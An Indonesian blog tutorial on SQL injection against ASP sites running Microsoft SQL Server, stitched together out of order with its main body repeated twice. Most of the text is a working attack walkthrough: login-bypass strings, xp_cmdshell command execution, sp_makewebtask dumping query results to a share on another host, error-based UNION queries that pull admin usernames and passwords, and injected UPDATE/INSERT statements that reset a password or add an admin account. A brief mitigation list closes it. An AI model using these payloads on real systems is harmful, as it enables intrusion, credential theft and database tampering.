Query diatas berarti menampilkan semua dari tabel product dengan “Pcategory”
sama dengan ‘food’ atau tidak. Sedangkan double dash “--“ menyatakan pada SQLserver untuk mengabaikan kesalahan query, yang akan membersihkan single quote
yang terakhir. Kadang kita dapat menggenti double quote dengan has tunggal “#”.
Jika cara diatas tidak dapat mennyebabkan SQL server mengabaikan kesalahan
query anda dapat mencoba.
' or 'a'='a
Sehingga query akan menjadi:
SELECT * FROM product WHERE PCategory='food' or 'a'='a'
Itu seharusnya akan menghasilkan hasil yang sama.
Tergantung pada peraturan Query, dapat dicoba dengan beberapa alternatif yang
mungkin:
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a

Melakukan perintah injeksi SQL berarti kita dapat mengeksekusi perintah SQL.
Secara default Microsoft SQL Server running sebagai SYSTEM, yang berarti sama dengan Administrator mengakses Windows. Kita dapat menggunakan store procedure seperti master..xp_cmdshell untuk melakukan remote exucution:

'; exec master..xp_cmdshell 'ping 10.10.1.2'--
Dapat dicoba menggunakan double quote (") jika single quote (') tidak berjalan.
Semi colon digunakan untuk mengakhiri query, jadi setelah semicolon kita membolehkan untuk memulai perintah SQL baru. Untuk menguji perintah diatas di eksekusi dengan sukses, anda dapat memperoleh informasi dari paket ICMP dari 10.10.1.2, yang akan mencek setiap paket dari server.
#tcpdump icmp
Jika tidak mendapatkan perintah request ping dari server, dan pesan error yang mengidikasikan kesalahan permission, ini juga berarti administrator membatasi akses
Web User untuk menakses store procedure tersebut.

Kita bisa menggunakan sp_makewebtask untuk menuliskan wuery dalam HTML.
'; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"
Dengan syarat target IP harus berupa folder “share” yang di sharing untuk semuanya user.

Kita dapat menggunakan informasi pesan kesalahan yang di keluarkan oleh MS SQL Server untuk mendapatkan sebagian data yang kita perlukan.
http://www.myandisun.com/barang.asp?id=10
Kita akan mencoba UNION integer ‘10’ dengan string dari database:
http://www.myandisun.com/barang.asp?id=10 UNION SELECT TOP 1 TABLE_NAME
FROM INFORMATION_SCHEMA.TABLES--
Tabel system INFORMATION_SCHEMA.TABLES berisi informasi semua tabel di dalam server. Pada TABLE_NAME fieldnya berisi dengan jelas nama masing-masing tabel dalam database. Itu kita pilih karena pasti ada dalam sebuah database dalam SQL Server, query nya adalah:
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLESQuery diatas akan mengembalikan tabel pertama dalam database. Ketika kita UNION nilai string dengan integer 10, MS-SQL Server mencoba menkonversi string
(nvarchar) menjadi integer. Ini akan menghasilkan error, ketika kita tidak bisa mengkonversi dari string (nvarchar) to int, server akan menampilkan pesan kesalahan.
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int. /barang.asp, line 5
Error ini bagus buat kita dan cukup untuk mengatakan pada kita ada nilai yang tidak dapat di konversi menjadi integer. Dalam kasus ini, kita memperoleh tabel pertama di dalam database, yang namanya “tabel1”.
Untuk dapat menampilkan nama tabel yang lain, kita dapat mengikuti query berikut:
http://www.myandisun.com/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN
('table1')--
Kita juga dapat mencari data mengunakan keyword LIKE.
http://www.myandisun.com/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME
FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE
'%25login%25'--
Hasil:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the
nvarchar value 'admin_login' to a column of data type int.
/index.asp, line 5
Jika kita lihat syntax ini sama antara '%25login%25' dan %login% dalam SQL Server. Dalam kasus ini, kita akan mendapatkan nama tabel pertama yang cocok untuk
criteria “admin_login”.

Kita dapat menggunakan kegunaan lain dari tabel INFORMATION_SCHEMA.COLUMNS untuk memetakan nama kolom dalam sebuah tabel dalam database.
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM
INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--
Hasil:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int.
/index.asp, line 5
Jika sekarang yang kita punya adalah colum nama pertama, kita dapat menggunakan NOT IN () untuk mendapatkan nama kolom berikutnya.
http://www.myandisun.com/index.asp?id=10 UNION SELECT TOP 1
COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE
TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id')--
Hasil:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int.
/index.asp, line 5
Ketika kita meneruskan lebih lanjut, kita memperoleh sisa (rest) nama kolom yang lain, seperti contoh: “password”, “detail”. Kita tahu ini ketika kita memperoleh pesan kesalahan.
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM
INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'
WHERE COLUMN_NAME NOT IN ('login_id','login_name','password',details')--
Hasil:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.
/index.asp, line 5

Sekarang kita sudah menidentifikasi beberapa tabel yang penting, dan nama kolomnya, kita dapat menggunakan teknik yang sama untuk informasi lebih lanjut yang kita inginkan dari database.
Sekarang, kita lihat login_name yang pertama dari tabel “admin_login”:

http://www.myandisun.com/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--
Hasil:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the
nvarchar value 'neo' to a column of data type int.
/index.asp, line 5
Kita tahu ada admin user dengan login name “neo”. Akhirnya mendapatkan password dari “neo” dari database.
http://www.myandisun.com/index.asp?id=10 UNION SELECT TOP 1 password
FROM admin_login where login_name='neo'--

Hasil:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the
nvarchar value 'm4trix' to a column of data type int./index.asp, line 5
Sekarang kita dapat login sebagai “neo” dengan menggunakan password “m4trix”.

Ada batasan teknik untuk menerangkan hal diatas. Kita tidak dapat mendapatkan pesan error jika kita mencoba menkonversi text yang terdiri dari valid number (carakter antara 0-9 saja). Kita coba mendapatkan password dari “trinity” yang “31173”.
http://www.myandisun.com/index.asp?id=10 UNION SELECT TOP 1 password
FROM admin_login where login_name='trinity'--

Kita mungkin akan mendapatkan sebuah halaman “Page Not Found” error. Ini karena password “31173” akan di konversi menjadi number, sebelum UNION dengan integer (10 dalam kasus ini). Selama statement UNION valid, SQL Sqerver tidak akan melemparkan pesan kesalahan, dan kita tidak akan mendapatkan kembalian data
beberapa masukan numeric.
Untuk dapat memecahkan masalah ini, kita dapat menginputkan numeric string dengan beberapa alphabet yang dipastikan gagal untuk di konversi. Kita coba query
berikut:

http://www.myandisun.com/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b'%20morpheus') FROM admin_login where login_name='trinity'--
Kita dengan mudah menggunakan tanda (+) untuk memasukkan password dengan suatu tek yang kita inginkan. Kode ASSCII untuk ‘+’ =0x2b. kita menambahkan ‘(space)morpheus’ dalam passeord yang sebenarnya. Oleh karena itu, selama kita mempunyai numeric string ‘31173’, ini akan menjadi ’31173’ morpheus’. Dengan memanggil function convert(), mencoba menkonversi ‘31173 mopheus’ menjadi sebuah integer, SQL Server akan mengeluarkan pesan kesalahan:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '31173 morpheus' to a column of data type int. /index.asp, line 5
Sekarang, anda dapat login sebagai 'trinity' dengan password '31173'.

Ketka kita sukses mengetahui nama kolom dalam tabel, kita memungkinkan untuk kita meng UPDATE atau melakukan INSERT record baru dalam tabel. Sebagai contoh menganti password “neo”:
http://www.myandisun.com/index.asp?id=10; UPDATE 'admin_login' SET 'password'
= 'newpas5' WHERE login_name='neo'--
Untuk INSERT record baru ke dalam database:
http://www.myandisun.com/index.asp?id=10; INSERT INTO 'admin_login' ('login_id',
'login_name', 'password', 'details') VALUES (666,'neo2','newpas5','NA')-- Kita dapat login sebagai “neo2” dengan password “newpas5”

Langkah yang dapat di tempuh untuk mengurangi penyusupan ke halaman web dengan SQL Injection dengan cara:

a. Memfilter dengan tidak membolehkan karakter seperti single quote, double quote, slash, back slash, semi  
    colon, extended character like NULL, carry return, new line, etc, dalam string form:
- Masukan dari from users
- Parameters di URL
- Nilai dari cookie
b. Untuk nilai numeric, convert dulu sebelum melewati statement SQL dengan mengunakan ISNUMERIC   
    untuk meyakinkan itu adalah integer.
c. Mengubah "Startup and run SQL Server" menggunakan low privilege user dalam SQL Server Security tab.
d. Ubah stored procedure – store procedure yang tidak terpakai, seperti:
master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask

SQL Injection dapat bekerja hanya dengan menggunakan Port 80. Fasilitas Web Server yang digunakan untuk menampilkan pesan kesalahan dan stored procedure default Microsoft SQL Server dapat di gunakan untuk mengekplorasi halaman web dengan SQL Injection.
Untuk meminimalkan penyusupan ke server Web dan Server Database kita dapat menghapus atau menonaktifkan service dan stored procedure yang tidak diperlukan.
Yang paling penting untuk menutup halaman web kita dengan dari serangan dengan metode SQL Injection adalah Validasi input sebelum dikirim ke web server.







Daftar Referensi
http://www.wiretrip.net/rfp/p/doc.asp?id=42&iface=6
http://www.blackhat.com/presentations/win-usa-01/Litchfield/BHWin01Litchfield.doc
http://www.owasp.org/asac/input_validation/sql.shtml
http://www.wiretrip.net/rfp/p/doc.asp?id=7&iface=6
http://www.wiretrip.net/rfp/p/doc.asp?id=60&iface=6
http://www.spidynamics.com/whitepapers/WhitepaperSQLInjection.pdf
Assalamu'allaikum,, udah  lama tidak posting bahkan kontrol pun tidak, sekarang saya akan membagian sebuah  artikel yang  sangat menarik di dunia hacking, menurut  saya memang dunia  hacking harus  banyak memutar otak dan  juga melatih  kesabaran, selain untuk pembelajaran bisa  juga untuk kita menjadi  sebuah metode untuk menjaga laman web kita agar tidak gampang di  Hack. oke dari pada basa - basi kita jelaskan dulu sedikit.

Ketika mesin server hanya port 80 yang dibuka, kita mempunyai keyakinan bahwa tidak akan menghasilkan sesuatu yang bermanfaat yang dapat digunakan untuk menyerang, admin juga beranggapan hanya degan mem-patch servernya dianggap aman. Jika anggapan itu terus dipakai berarti kita “menekan tombol” untuk membuka hacker masuk.
SQL Injection adalah salah satu tipe meng-hack yang hanya membutuhkan port 80 dan tidak memerlukan port lain. SQL injection akan menyerang aplikasi web yang berbasiskan side-server scripting seperti ASP, JSP, PHP, CGI, dan yang mirip dengan itu. Pada artikel ini kita tidak akan membahas hal yang paling baru tentang SQL Injection, karena motode dan trik SQL Injection terus berkembang.
Sebelum anda membaca lebih lanjut, anda harus mnegetahui terlebih dahulu bagaimana database bekerja dan bagaimana SQL digunakan untuk mengaksesnya.Kata Kunci: Web Site, SQL, SQL Injection

SQL Injection adalah sebuah teknik untuk mengeksporasi aplikasi web dengan memanfaatkan suplai data dari client dalam sintak SQL. Banyak halaman web memakai parameter dari web user untuk menggunakan query ke dalam database.
Kita ambil sebagai contoh ketika user akan login, halaman user akan mengirim user dan login sebagai parameter untuk digunakan sebagai SQL dan mencek apakah usedan password cocok. Dengan SQL Injection ini sangat mungkin untuk kita mengirim user nama dan password dan dianggap benar.
Walaupun mudah untuk menandai dan melindungi model serangan ini, tapi cukup mengherankan banyak aplikasi web yang terserang dengan metode ini. Pada pembahasan selanjutnya dicontohkan ketika memakai web server IIS dan Microsoft SQL Server untuk databasenya, sedangkan skrip yang dipakai adalah ASP.

Untuk keperluan SQL Injection kita hanya membutuhkan browser. Browser yang
dipakai adalah segala macam browser.

Kita dapat memanfaatkan halaman-halaman web yang terdapat submit data, contoh: halaman login, pencarian, feedback, dan lain-lain. Kadang halaman HTML menggunakan metode POST untuk mengirim parameter ke halaman web yang lain.

Jika model halamnnya seperti ini maka kita harus melihat source code karena kita tidak dapat melihat pada URL. Mudah untuk mencek source code halaman HTML, tinggal klik kanan pilih view source (pada Internet Exlorer), kemudian cari kode :

“FORM”. Berikut contoh halaman tersebut:
<FORM action=search.asp method=post>
<input type=hidden name=login value=andi>
</FORM>
Semua yang terletak diantara <FORM> dan </FORM> mempunyai potensial untuk digunakan mengekplorasi halaman web tersebut. Karena itu dapat menjadi sebuah parameter. Halaman diatas berarti akan mengrimkan parameter bernama “login”
dengan nilai (value)=”andi”.

Jika halaman bukan berbentuk form input, maka anda harus cari halaman yang di
buat dengan bahasa pemrograman internet seperti ASP, JSP, CGI or PHP, kemudian
cari spesial URL seperti http://www.myandisun.com/profile.asp?id=10. Ini berarti
halaman web ASP dengan parameter “id” yang bernilai “10”.

Bagaimana cara mengetes suatu halaman web mudah diserang?
Dimulai dari pengunaan single quote. Seperti masukan:
hi or 1=1--
Dalam login, password, atau URL lain.
Contoh:

- Login: hi' or 1=1--
- Pass: hi' or 1=1--
- http://www.myandisun.com/profil.asp?id=10id=hi' or 1=1--
Jika halaman dalam bentuk ada field yang bertipe hidden, anda tinggal download
kode HTML dari situs yang anda buka ke hard disk anda, di modifikasi sedikit
kemudian di simpan dalam hard disk dan modifikasi URL, seperi contoh berikut:
Skrip awal:
<FORM action=search.asp method=post>
<input type=hidden name=cari value=t610 >
</FORM>
Setelah di modifikasi:
<FORM action=http://www.myandisun.com/search.asp method=post>
<input type=hidden name=cari value=t610>
</FORM>

Jika anda beruntung maka dengan cara seperti itu anda dapat masuk ke halaman web tanpa harus mengisikan login name dan password yang benar.
Kenapa Harus ‘ or 1=1--
Kita akan ekplorasi pentingnya 1=1 -- dan apakah memperoleh informasi yang tidak normal (diberikan kepada user biasa) dari sebuah web site. Kita ambil halaman asp yang di link ke halaman lain seperti URL berikut:
http://www.myandisun.com/barang.asp?category=food
Dalam URL diatas, “category” adalah nama variabel sedangkan “food” adalah nilai yang diberikan pada variabel tersebut. Untuk dapat mengambil nilai dari variabel diatas berikut code program pada file barang.asp.
v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)
seperti kita lihat pada contoh diatas variabel kita bungkus dan diberi nama “v_cat”
dan SQL menjadi:
SELECT * FROM product WHERE PCategory='food'
Pada query diatas menghasilkan ini satu atau beberapa baris yang cocok untuk
kondisi dimana (WHERE) kondisinya adalah ‘food’.
Sekarang kita asumsikan URL diatas kita ganti menjadi seperti ini:
http://www.myandisun.com/barang.asp?category=food' or 1=1--
Sekarang variabel “v_cat” kita menjadi “foot’ or 1=1—“, jika masukkan ke query maka:
SELECT * FROM product WHERE PCategory='food' or 1=1--'
Query diatas berarti menampilkan semua dari tabel product dengan “Pcategory”
sama dengan ‘food’ atau tidak. Sedangkan double dash “--“ menyatakan pada SQLserver untuk mengabaikan kesalahan query, yang akan membersihkan single quote
yang terakhir. Kadang kita dapat menggenti double quote dengan has tunggal “#”.
Jika cara diatas tidak dapat mennyebabkan SQL server mengabaikan kesalahan
query anda dapat mencoba.
' or 'a'='a
Sehingga query akan menjadi:
SELECT * FROM product WHERE PCategory='food' or 'a'='a'
Itu seharusnya akan menghasilkan hasil yang sama.
Tergantung pada peraturan Query, dapat dicoba dengan beberapa alternatif yang
mungkin:
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a

Melakukan perintah injeksi SQL berarti kita dapat mengeksekusi perintah SQL.
Secara default Microsoft SQL Server running sebagai SYSTEM, yang berarti sama dengan Administrator mengakses Windows. Kita dapat menggunakan store procedure seperti master..xp_cmdshell untuk melakukan remote exucution:

'; exec master..xp_cmdshell 'ping 10.10.1.2'--
Dapat dicoba menggunakan double quote (") jika single quote (') tidak berjalan.
Semi colon digunakan untuk mengakhiri query, jadi setelah semicolon kita membolehkan untuk memulai perintah SQL baru. Untuk menguji perintah diatas di eksekusi dengan sukses, anda dapat memperoleh informasi dari paket ICMP dari 10.10.1.2, yang akan mencek setiap paket dari server.
#tcpdump icmp
Jika tidak mendapatkan perintah request ping dari server, dan pesan error yang mengidikasikan kesalahan permission, ini juga berarti administrator membatasi akses
Web User untuk menakses store procedure tersebut.

Kita bisa menggunakan sp_makewebtask untuk menuliskan wuery dalam HTML.
'; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"
Dengan syarat target IP harus berupa folder “share” yang di sharing untuk semuanya user.

Kita dapat menggunakan informasi pesan kesalahan yang di keluarkan oleh MS SQL Server untuk mendapatkan sebagian data yang kita perlukan.
http://www.myandisun.com/barang.asp?id=10
Kita akan mencoba UNION integer ‘10’ dengan string dari database:
http://www.myandisun.com/barang.asp?id=10 UNION SELECT TOP 1 TABLE_NAME
FROM INFORMATION_SCHEMA.TABLES--
Tabel system INFORMATION_SCHEMA.TABLES berisi informasi semua tabel di dalam server. Pada TABLE_NAME fieldnya berisi dengan jelas nama masing-masing tabel dalam database. Itu kita pilih karena pasti ada dalam sebuah database dalam SQL Server, query nya adalah:
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLESQuery diatas akan mengembalikan tabel pertama dalam database. Ketika kita UNION nilai string dengan integer 10, MS-SQL Server mencoba menkonversi string
(nvarchar) menjadi integer. Ini akan menghasilkan error, ketika kita tidak bisa mengkonversi dari string (nvarchar) to int, server akan menampilkan pesan kesalahan.
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int. /barang.asp, line 5
Error ini bagus buat kita dan cukup untuk mengatakan pada kita ada nilai yang tidak dapat di konversi menjadi integer. Dalam kasus ini, kita memperoleh tabel pertama di dalam database, yang namanya “tabel1”.
Untuk dapat menampilkan nama tabel yang lain, kita dapat mengikuti query berikut:
http://www.myandisun.com/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN
('table1')--
Kita juga dapat mencari data mengunakan keyword LIKE.
http://www.myandisun.com/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME
FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE
'%25login%25'--
Hasil:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the
nvarchar value 'admin_login' to a column of data type int.
/index.asp, line 5
Jika kita lihat syntax ini sama antara '%25login%25' dan %login% dalam SQL Server. Dalam kasus ini, kita akan mendapatkan nama tabel pertama yang cocok untuk
criteria “admin_login”.

Kita dapat menggunakan kegunaan lain dari tabel INFORMATION_SCHEMA.COLUMNS untuk memetakan nama kolom dalam sebuah tabel dalam database.
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM
INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--
Hasil:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int.
/index.asp, line 5
Jika sekarang yang kita punya adalah colum nama pertama, kita dapat menggunakan NOT IN () untuk mendapatkan nama kolom berikutnya.
http://www.myandisun.com/index.asp?id=10 UNION SELECT TOP 1
COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE
TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id')--
Hasil:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int.
/index.asp, line 5
Ketika kita meneruskan lebih lanjut, kita memperoleh sisa (rest) nama kolom yang lain, seperti contoh: “password”, “detail”. Kita tahu ini ketika kita memperoleh pesan kesalahan.
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM
INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'
WHERE COLUMN_NAME NOT IN ('login_id','login_name','password',details')--
Hasil:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.
/index.asp, line 5

Sekarang kita sudah menidentifikasi beberapa tabel yang penting, dan nama kolomnya, kita dapat menggunakan teknik yang sama untuk informasi lebih lanjut yang kita inginkan dari database.
Sekarang, kita lihat login_name yang pertama dari tabel “admin_login”:

http://www.myandisun.com/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--
Hasil:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the
nvarchar value 'neo' to a column of data type int.
/index.asp, line 5
Kita tahu ada admin user dengan login name “neo”. Akhirnya mendapatkan password dari “neo” dari database.
http://www.myandisun.com/index.asp?id=10 UNION SELECT TOP 1 password
FROM admin_login where login_name='neo'--

Hasil:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the
nvarchar value 'm4trix' to a column of data type int./index.asp, line 5
Sekarang kita dapat login sebagai “neo” dengan menggunakan password “m4trix”.

Ada batasan teknik untuk menerangkan hal diatas. Kita tidak dapat mendapatkan pesan error jika kita mencoba menkonversi text yang terdiri dari valid number (carakter antara 0-9 saja). Kita coba mendapatkan password dari “trinity” yang “31173”.
http://www.myandisun.com/index.asp?id=10 UNION SELECT TOP 1 password
FROM admin_login where login_name='trinity'--

Kita mungkin akan mendapatkan sebuah halaman “Page Not Found” error. Ini karena password “31173” akan di konversi menjadi number, sebelum UNION dengan integer (10 dalam kasus ini). Selama statement UNION valid, SQL Sqerver tidak akan melemparkan pesan kesalahan, dan kita tidak akan mendapatkan kembalian data
beberapa masukan numeric.
Untuk dapat memecahkan masalah ini, kita dapat menginputkan numeric string dengan beberapa alphabet yang dipastikan gagal untuk di konversi. Kita coba query
berikut:

http://www.myandisun.com/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b'%20morpheus') FROM admin_login where login_name='trinity'--
Kita dengan mudah menggunakan tanda (+) untuk memasukkan password dengan suatu tek yang kita inginkan. Kode ASSCII untuk ‘+’ =0x2b. kita menambahkan ‘(space)morpheus’ dalam passeord yang sebenarnya. Oleh karena itu, selama kita mempunyai numeric string ‘31173’, ini akan menjadi ’31173’ morpheus’. Dengan memanggil function convert(), mencoba menkonversi ‘31173 mopheus’ menjadi sebuah integer, SQL Server akan mengeluarkan pesan kesalahan:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '31173 morpheus' to a column of data type int. /index.asp, line 5
Sekarang, anda dapat login sebagai 'trinity' dengan password '31173'.

Ketka kita sukses mengetahui nama kolom dalam tabel, kita memungkinkan untuk kita meng UPDATE atau melakukan INSERT record baru dalam tabel. Sebagai contoh menganti password “neo”:
http://www.myandisun.com/index.asp?id=10; UPDATE 'admin_login' SET 'password'
= 'newpas5' WHERE login_name='neo'--
Untuk INSERT record baru ke dalam database:
http://www.myandisun.com/index.asp?id=10; INSERT INTO 'admin_login' ('login_id',
'login_name', 'password', 'details') VALUES (666,'neo2','newpas5','NA')-- Kita dapat login sebagai “neo2” dengan password “newpas5”

Langkah yang dapat di tempuh untuk mengurangi penyusupan ke halaman web dengan SQL Injection dengan cara:

a. Memfilter dengan tidak membolehkan karakter seperti single quote, double quote, slash, back slash, semi  
    colon, extended character like NULL, carry return, new line, etc, dalam string form:
- Masukan dari from users
- Parameters di URL
- Nilai dari cookie
b. Untuk nilai numeric, convert dulu sebelum melewati statement SQL dengan mengunakan ISNUMERIC   
    untuk meyakinkan itu adalah integer.
c. Mengubah "Startup and run SQL Server" menggunakan low privilege user dalam SQL Server Security tab.
d. Ubah stored procedure – store procedure yang tidak terpakai, seperti:
master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask

SQL Injection dapat bekerja hanya dengan menggunakan Port 80. Fasilitas Web Server yang digunakan untuk menampilkan pesan kesalahan dan stored procedure default Microsoft SQL Server dapat di gunakan untuk mengekplorasi halaman web dengan SQL Injection.
Untuk meminimalkan penyusupan ke server Web dan Server Database kita dapat menghapus atau menonaktifkan service dan stored procedure yang tidak diperlukan.
Yang paling penting untuk menutup halaman web kita dengan dari serangan dengan metode SQL Injection adalah Validasi input sebelum dikirim ke web server.







Daftar Referensi
http://www.wiretrip.net/rfp/p/doc.asp?id=42&iface=6
http://www.blackhat.com/presentations/win-usa-01/Litchfield/BHWin01Litchfield.doc
http://www.owasp.org/asac/input_validation/sql.shtml
http://www.wiretrip.net/rfp/p/doc.asp?id=7&iface=6
http://www.wiretrip.net/rfp/p/doc.asp?id=60&iface=6
http://www.spidynamics.com/whitepapers/WhitepaperSQLInjection.pdf
Tutorial SQL Injection Lengkap
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHViac6z_FL2Iju-ym0PL1s7zsOxBQFzY5bnCZw_DNARiarZWPmu8xxFDBaZtNDmJwlYvmEMGzQ6aShqzi0TQjlOFOxqfEOmaJLglaINIDX24Du7S97i3KwWpUXk78DboAg6qW2zj_3KLs/s72-c/chell.jpeg.png
View detail
 
Support : Creating Website | FKPMJ | Mas Template
Copyright © 2020Share otak - All Rights Reserved
Template Created by Creating Website Published by Mas Template
Proudly powered by Blogger